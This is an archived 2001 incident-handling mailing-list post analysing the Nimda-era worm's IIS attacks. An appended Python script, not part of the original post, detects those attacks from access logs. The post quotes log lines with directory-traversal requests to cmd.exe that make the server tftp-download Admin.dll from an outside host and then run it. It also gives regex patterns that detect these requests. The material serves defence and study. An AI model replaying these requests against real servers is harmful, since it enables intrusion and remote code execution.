RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis update

From: Michael Halls (mhallsat_private)
Date: Wed Sep 19 2001 - 13:21:20 PDT

    On Wed, 19 Sep 2001, George Milliken wrote:
    
    > Maybe something like a rewrite rule
    >
    > RewriteEngine	On
    > RewriteRule	^.*/cmd.exe.*	-	[F,L]
    > RewriteRule	^.*/root.exe.*	-	[F,L]
    >
    > This will send "forbidden" to systems trying those URLs and will stop
    > rewrite processing.
    >
    
    Actually this may increase the load to those servers.  When the worm's
    probe receives anything other than a 404 (not found) it makes several other
    requests to the server to exploit the machines.  It first tries to copy the
    Admin.dll to the c:, d:, and e: drives:
    
    216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-"
    216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 51 "-" "-"
    216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 51 "-" "-"
    216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 51 "-" "-"
    
    The worm then attempts to execute the Admin.dll
    
    216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-"
    
    This has the effect of increasing the traffic about 5 fold.
    
    The worm also will continue to probe/exploit the machine after it gets a
    "hit" so a machine that returns 403 (forbidden) for each of the 16 attacks
    would get about 80 hits to their website from each machine.  Playing
    around with some cgi scripts that tarpit requests it looks like the worm's
    tcp connections time out after 1 minute 30 seconds without a response.  By
    sleeping my script for about 1 minute 15 seconds I can hold a machine in
    my "tarpit" for about an hour and a half.
    
    Does anybody know if this thing is single threaded?
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    
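Detection logic for the probe sequence described in the message above, as an added example that is not part of the original post or the list: it parses Apache access-log lines in the format quoted, tags each request as the initial cmd.exe/root.exe probe, the tftp copy of Admin.dll, or the attempt to execute Admin.dll, and reports per source host how many follow-up requests arrived and whether the server answered the probe with something other than 404 (the condition the post identifies as inviting the follow-ups). The sample log consists of the lines quoted in the post plus two constructed lines (a benign request from 10.0.0.5 and a probe from 192.0.2.10 that was answered with a 404); the stage names and function names are my own.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional

# Apache common/combined log prefix: host ident user [time] "method path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Attack stages taken from the post, checked in this order because the tftp
# request path also contains "cmd.exe" and "Admin.dll". Stage names are my own.
STAGES = [
    ("tftp_copy_admin_dll", re.compile(r'tftp', re.I)),
    ("execute_admin_dll", re.compile(r'/Admin\.dll(\?|$)', re.I)),
    ("probe_cmd_or_root_exe", re.compile(r'/(cmd|root)\.exe', re.I)),
]

# Constructed sample: the five requests quoted in the post, a benign request,
# and a probe from another host that received a 404.
SAMPLE_LOG = r'''
216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 51 "-" "-"
216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-"
10.0.0.5 - - [19/Sep/2001:12:40:00 -0700] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
192.0.2.10 - - [19/Sep/2001:12:45:00 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 0 "-" "-"
'''


def classify(path: str) -> Optional[str]:
    """Return the attack stage a request path belongs to, or None if benign."""
    for stage, rx in STAGES:
        if rx.search(path):
            return stage
    return None


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; None if it does not match the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["stage"] = classify(rec["path"])
    return rec


def summarize(lines: List[str]) -> Dict[str, dict]:
    """Per source host: requests per stage, total, and how many got a non-404 answer."""
    report = defaultdict(lambda: {"stages": Counter(), "non_404": 0, "total": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["stage"] is None:
            continue  # unparsable or benign
        entry = report[rec["host"]]
        entry["total"] += 1
        entry["stages"][rec["stage"]] += 1
        if rec["status"] != 404:
            entry["non_404"] += 1
    return dict(report)


def hosts_with_followups(report: Dict[str, dict]) -> List[str]:
    """Hosts that went beyond the initial probe (tftp copy or Admin.dll execution)."""
    return sorted(
        host for host, entry in report.items()
        if entry["stages"]["tftp_copy_admin_dll"] or entry["stages"]["execute_admin_dll"]
    )


if __name__ == "__main__":
    report = summarize(SAMPLE_LOG.strip().splitlines())
    for host, entry in report.items():
        print(host, entry["total"], "requests,", entry["non_404"], "answered non-404:",
              dict(entry["stages"]))
    print("hosts with follow-up stages:", hosts_with_followups(report))
```

Run against a real access log, a host that shows only the probe stage and a non-404 count of zero is the outcome the post argues for; a host that shows tftp or Admin.dll stages means the probe was answered with something other than 404 and the follow-up traffic the post measures has already arrived.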



    This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 14:48:52 PDT